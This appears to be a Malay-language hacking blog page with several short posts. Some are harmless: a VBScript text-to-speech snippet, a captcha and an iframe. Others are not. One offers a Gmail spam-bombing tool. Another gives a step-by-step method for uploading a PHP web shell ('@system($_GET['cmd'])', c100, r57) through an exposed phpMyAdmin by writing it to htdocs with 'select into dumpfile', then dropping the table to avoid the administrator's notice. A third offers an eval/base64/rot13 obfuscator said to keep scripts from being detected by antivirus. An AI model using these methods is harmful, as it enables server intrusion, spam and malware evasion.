Gmail Boomer




bosan2 td wt bende alah ni..kui3..first time gne vb 2008..

Download source code :

Gmail Boomer/Spammer Box


Read Users' Comments ( 0 )

Text Bercakap

Dim msg, cakap
do
msg = InputBox("Masukkan Ayat Dibawah :","Text Bercakap by try","try")
Set cakap=CreateObject("sapi.spvoice")
cakap.Speak msg
Loop until msg="berhentea"
msgbox "Terima Kasih Menggunakan Program Ini.",,"Terima Kasih"


copy sume tu dlm notepad then save as la pape.vbs..contoh cakap.vbs ke..utk berhenti korg taip dlm kolum tu berhentea coz berhentea = berhenti dr cara die sebut.. =))


klu nk simple yg ni..

Dim msg, cakap
msg = InputBox("Masukkan Ayat Dibawah :","Text Bercakap")
Set cakap=CreateObject("sapi.spvoice")
cakap.Speak msg


Read Users' Comments ( 0 )

Simple Captcha




download link :

download file

sample link


Read Users' Comments ( 0 )

upload shell phpmyadmin xampp

cara-cara upload shell pada phpmyadmin xampp

1. site.com/phpmyadmin


2. create database..contoh : try

then klik create



jika berjaya




3. kemudian klik pada sql query..
akan kuar paparan new window,then paste kn kod ini n klik go


CREATE TABLE temptab(
codetab TEXT
) TYPE=MYISaM;




jika berjaya





4. klik table temptab yang telah dihasilkan tadi n klik kotak insert

then paste kn shell kod anda pada kotak value then klik go



selain menggunakan c100 atau r57,boleh juga gne kn simple shell ini

@system($_GET['cmd'])


jika berjaya





5. utk melihat dimana folder terinstallnya phpmyadmin ini,klik pada variable dan lihat character sets dir




secara defaultnya berada pada partition c:\xampp


6. setelah dipastikan kedudukan folder itu, klik kembali pada sql query then paste kn kod ini then klik go

select * into dumpfile 'C:/xampp/htdocs/2.php' from temptab; flush logs;




C:/xampp/htdocs/log.php <-- c:/xampp/hotdcs ialah folder shell akan berada dan 2.php ialah link utk access shell, terserah jika mahu meletakkan nama lain sekalipun..

jika berjaya





selesai,then boleh la gne shell yg telah diupload tadi.. :)

contohnye : site.com/2.php


alternatif jika tidak mahu dikesan oleh admin ialah drop table yg telah dibuat tadi..

klik pada database then tick kn pada nama database yg telah dihasilkn sebentar tadi n klik drop





p/s: securekn server dgn cara meletakkan password pada pada root atau localhost anda supaya tidak boleh diakses atau diubah



Read Users' Comments ( 0 )

Simple IFrame



rasanya dah ramai tau iframe ni ape..sje je post utk wt koleksi..hehe

Simple IFrame



Read Users' Comments ( 0 )

Code Compressor 1



Hari ni rasa nak ubahsuai kod compressor semalam sebabnya untuk memudahkn kerja2 encryption tanpa perlu upload file terlebih dahulu.. So ini lah hasil nya.. Thanx pada XShimeX n t_qooze coz salu membantu aku.. ;) sharing is caring..

Link Untuk Code Compressor



Read Users' Comments ( 0 )



- Untuk mendecode kn file @eval(gzinflate(base64_decode(str_rot13($code)))) yang telah dicompress menggunakan aplikasi code compressor pada posting sebelumnya.

link untuk decode


Read Users' Comments ( 1 )

Code Compressor



- Aplikasi ini digunakan utk memampatkan script agar menjadi lebih kecil.

- Selain itu, ia digunakan utk melindungi source code dari diubahsuai.

- Ia juga dapat mengelakkan kod/script dari dikesan oleh antivirus sebagai virus.


source code


link code compressor


Read Users' Comments ( 0 )